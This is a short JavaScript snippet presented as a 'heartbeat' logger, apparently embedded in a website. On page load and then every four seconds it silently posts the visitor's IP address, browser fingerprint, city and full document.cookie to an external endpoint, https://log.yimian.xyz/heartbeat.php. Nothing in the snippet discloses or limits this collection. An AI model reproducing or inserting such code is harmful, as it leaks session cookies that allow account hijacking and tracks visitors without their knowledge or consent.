(function heartbeat_log() { setTimeout(function(){ setInterval(function(){ if(__isCookie){ $.post("https://log.yimian.xyz/heartbeat.php",{"fp":fp, "cookie":document.cookie}); cookie.set('fp',fp); } },4000); $.post("https://log.yimian.xyz/heartbeat.php",{"ip":ip,"fp":fp,"city":ipCity}); },3000); })();